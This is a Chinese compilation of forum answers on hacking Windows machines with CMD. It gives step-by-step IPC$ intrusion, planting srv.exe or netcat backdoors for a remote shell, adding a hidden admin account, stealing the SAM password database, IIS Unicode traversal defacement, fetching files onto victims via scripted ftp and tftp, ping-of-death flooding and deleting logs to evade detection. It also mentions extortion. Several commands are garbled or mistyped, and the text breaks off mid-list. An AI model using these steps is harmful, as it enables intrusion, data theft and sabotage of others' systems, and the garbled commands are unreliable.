入侵命令cmd

A. 跪求cmd黑客攻擊指令和cmd電腦命令！懸賞大大滴有

一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推)
如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，後面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什麼地方去了）。
3. C:\>net time \\127.0.0.1
查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧（這里設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵！）
5. C:\>net time \\127.0.0.1
再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧，注意埠是99。Telnet默認的是23埠，但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動（這里的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務！
9.Telnet 127.0.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟：
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功，連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt；

下面純手打，上面是度娘給的

taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組

B. 怎樣用CMD攻擊！拜託各位了 3Q

CMD—入侵的常用命令 一般入侵所需要的幾個常用命令 1：NET 只要你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！ 這里我們假如你得到的用戶是XC，密碼是123456。假設對方IP為127.0.0.1 net use \\\\127.0.0.1\\ipc$ "123456" /user:"XC" 退出的命令是 net use \\\\127.0.0.1\\ipc$ /delte 下面的操作你必須登陸後才可以用.登陸的方法就在上面. ---------------------- 下面我們講怎麼創建一個用戶，由於SA的許可權相當於系統的超級用戶. 我們加一個XC的用戶密碼為123456 net user XC 123456 /add 只要顯示命令成功,那麼我們可以把他加入Administrator組了. net 123456 Administrators XC /add ---------------------- 這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤. net use z:\\\\127.0.0.1\\c$ ---------------------- net start telnet 這樣可以打開對方的TELNET服務. ---------------------- 這里是將Guest用戶激活，guest是NT的默認用戶，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。 net user guest /active:yes ---------------------- 這里是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。只要有許可權就行了呀！ net user guest lovechina 2:at 一般一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麼啟動他呢？ 那麼需要用AT命令，這里假設你已經登陸了那個伺服器。 你首先要得到對方的時間， net time \\\\127.0.0.1 將會返回一個時間，這里假設時間為12:1,現在需要新建一個作業，其ID=1 at \\\\127.0.0.1 12:3 nc.exe 這里假設了一個木馬，名為NC.EXE,這個東西要在對方伺服器上. 這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,埠為99. 等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬. 3:telnet 這個命令非常實用,它可以與遠方做連接，不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的埠. telnet 127.0.0.1 99 這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也就是肉雞. 4:FTP 它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個[url] http://www.51.net/[/url], 不錯的.當我們申請完後，它會給用戶名,密碼,以及FTP伺服器. 在上傳前需要登陸先，這里我們假設FTP伺服器是[url] http://www.51.net/[/url], 用戶名是HUCJS,密碼是654321 ftp [url] http://www.51.net/[/url] 他會要求輸入用戶,成功後會要求輸入密碼. ---------------------- 下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\\下,傳到對方D:\\ get c:\\index.htm d:\\ 假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下 put c:\\index.htm d:\\ 5: 下面我說說怎樣把本地的文件復制到對方硬碟上去，需要建立好IPC$連接才有效。 這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下 index.htm \\\\127.0.0.1\\c$\\index.htm ---------------------- 如果你要復制到D盤下把C改為D，就行了！ index.htm \\\\127.0.0.1\\d$\\index.htm ---------------------- 如果你要把他復制到WINNT目錄里 就要把輸入 index.htm \\\\127.0.0.1\\admin$\\index.htm admin$是winnt ---------------------- 要把對方的文件復制過來，順便告訴大家NT的備份的資料庫放在x:\\winnt\\repair\\sam._ sam._是資料庫的文件名 下面就把127.0.0.1的資料庫復制到本地C盤下 \\\\127.0.0.1\\admin$\\repair\\sam._ c:\\ ---------------------- 6：set 如果你跑進了一部機子，而且想黑他（這思想只能在特別時候才准有），當然他的80埠要開，不然你黑給誰看。這時需要用SET命令！ 下面是我得到的結果！我來分析它，只是找主頁在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\\WINNT\\system32\\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=當前登陸者的IP，這里本來是顯示我的IP，被我刪除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\\WINNT\\system32\\os2\\dll; OS=Windows_NT Path=D:\\WINNT\\system32;D:\\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\\vlroot主頁放在的地址，只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這里是E:\\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\\WINNT TZ=GMT-9 USERPROFILE=D:\\WINNT\\Profiles\\Default User windir=D:\\WINNT 粉紅色的那行就是對方主頁存放地址，這里告訴大家一個技巧，很笨的技巧啊，不過只能用這個方法才能100%的找到主頁的名稱，當你DIR這個目錄時，一定會看到很多文件，你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名，這樣只要看到和XX.XX.XX.XX看到的也面一模一樣，那麼這就是主頁的名稱了。 7：nbtstat 如果你掃到一部NT的機子，他的136到139其中一個埠開了的話，就要用這個命令得到用戶了。順便告訴大家這是netbios，得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼，密碼和用戶名一樣的，都試下，不行就暴力破解吧！ 現在網上很多NT的機子都開了這些埠的，你可以練習下，我們來分析得到的結果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大寫哦。 下面是得到的結果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 粉紅色的就是登陸過這部系統的用戶，可能你不知道怎麼看，大家是不是看到了一竄數字，只要這竄數字是<03>的話，那他前面的就是用戶。 這里的用戶是PENTIUMII。 8：Shutdown 關了對方的NT伺服器的命令 Shutdown \\\\IP地址 t:20 20秒後將NT自動關閉，三思後才能運行這個命令，這樣對對方造很大的損失，要做個有良心的入侵者呀。 9：DIR 這個命令沒什麼好講，但是卻非常重要，他是查看一目錄里的所有文件、文件夾。 你可以本地試下。 10：echo 著名的漏洞Unicode，這個命令可以簡單的黑一下有這個漏洞的主機。 我們假設我們要把「南京大屠殺鐵證如山，任何日本人不得抵賴！」寫入index.htm，有2種方法，大家看看有什麼區別。 echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>index.htm echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>>index.htm 第一個的意思是覆蓋index.htm原有的內容，把「南京大屠殺鐵證如山，任何日本人不得抵賴！」寫進index.htm。 第二個的意思是把「南京大屠殺鐵證如山，任何日本人不得抵賴！」加到index.htm裡面。 「>>」產生的內容將追加進文件中，「>」則將原文件內容覆蓋。 大家可以本地試下。 可能你會問，這樣簡單黑下有什麼好玩的，其實他可以用來下載主頁到對方的目錄里。 1、首先，我們需要申請一個免費的主頁空間。 2、用echo在可寫目錄下建立如下內容的txt文件：（以chinren伺服器為例。） open upload.chinaren.com（你的FTP伺服器，申請時你的空間提供商會給你的） cnhack（你申請時的用戶名） test（你申請時的密碼） get index.htm c:\\inetpub\\wwwroot\\index.htm（這里是把你空間上的index.htm下載到對方的c:\\inetpub\\wwwroot\\index.htm） bye（退出FTP對話，相當在98下的DOS，用EXIT退出DOS） 具體的做法： 輸入echo open upload.chinaren.com> c:\\cnhack.txt 輸入echo cnhack >> c:\\cnhack.txt 輸入echo 39abs >> c:\\cnhack.txt 輸入echo get index.htm c:\\inetpub\\wwwroot\\index.htm+>>+c:\\cnhack.txt 最後輸入 ftp -s:c:\\cnhack.txt （利用ftp的-s參數，執行文件里的內容。） 等命令完成時，文件已經下載到你指定的文件里了。 注意：取得文件後，請刪除cnhack.txt。（如果不刪除，很容易會給別人看到你的密碼。） 記得要 del c:\\cnhack.txt 11:attrib 這個命令是設置文件屬性的。如果你想黑一個站，而他的主頁的文件屬性設置了只讀，那就很可憐呀，想刪除他也不行，想覆蓋他也不行。倒！不過有這個命令就別怕了。 attrib -r index.htm 這個命令是把index.htm的只讀屬性去掉。 如果把「-」改為「+」則是把這個文件的屬性設置為只讀 ---------------------- attrib +r index.htm 這個命令是把index.htm的屬性設置為只讀。 12:del 當你看到這個標題可別倒下啊！現在要離開127.0.0.1了，要刪除日誌，當然要刪除日誌啦！想被捉嗎。呵呵。 NT的日誌有這些 del C:\\winnt\\system32\\logfiles\\*.* del C:\\winnt\\ssytem32\\config\\*.evt del C:\\winnt\\system32\\dtclog\\*.* del C:\\winnt\\system32\\*.log del C:\\winnt\\system32\\*.txt del C:\\winnt\\*.txt del C:\\winnt\\*.log 只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤，就要把C改成其他盤

採納哦

C. 怎樣利用「CMD」進行黑客入侵

net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IPput c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：format D: /FS:NTFS
md目錄名 創建目錄
replace 源文件要替換文件的目錄 替換文件
ren 原文件名新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

四：
IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

最佳吧

D. cmd入侵命令 telnet 連接上對方電腦之後要怎麼操作

提許可權，中木馬，開後門，獲取數據，清理痕跡。退出。

E. 請問怎樣用CMD命令通過ip攻擊別人

cmd 攻擊一般都是區域網內攻擊 外網是DDOS攻擊 區域網內攻擊首先你得知道IP 攻擊可以使用PING包 PING死他 cmd -ping xxx.xxx.xxx.xxx 空格 -l 空格 -n 空格 65000s （X代表Ip地址)

F. 別人用我的電腦使用cmd命令符能攻擊電腦嗎

當然是可以的，cmd命令符本身就是類似這種幫助自己的東西，比如埠掃描要用到，建立賬戶入侵要用到，不過現在的電腦防護都很牢固。cmd還可以取消對方的防火牆，更改或者建立登錄密碼，這樣可以鎖住對方的電腦，敲詐必備
所以，cmd完全可以攻擊電腦，不過也不用擔心，我說的都是電腦技術很厲害才可以。

望採納

G. CMD命令使用方法

CMD命令使用方法

熟練掌握CMD命令，只對我們有好處，沒有壞處。CMD命令包含Windows系統的所有CMD命令，學好CMD命令不僅在工作中對我們很有作用，而且在日常生活中也給我們帶來了很大的幫助。那CMD命令如何使用?下面就和大家分享一下掌握CMD命令的方法。

CMD命令如下：

一，ping

它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了(下同)。

-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。

-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。

-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。

說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如“ping IP -t -n 3”，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。

下面我們舉個例子來說明一下具體用法。

這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說“初步判斷”是因為這個值是可以修改的。這里TTL=32表示操作系統可能是 win98。

(小知識：如果TTL=128，則表示目標主機可能是Win2000;如果TTL=250，則目標主機可能是Unix)

至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。

二，nbtstat

該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。

-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息(下同)。

-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。

-n 列出本地機器的NETBIOS信息。

當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。

三，netstat

這是一個用來查看網路狀態的命令，操作簡便功能強大。

-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息，如圖4。

這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。

-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。

四，tracert

跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。如圖5。

這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。

五，net

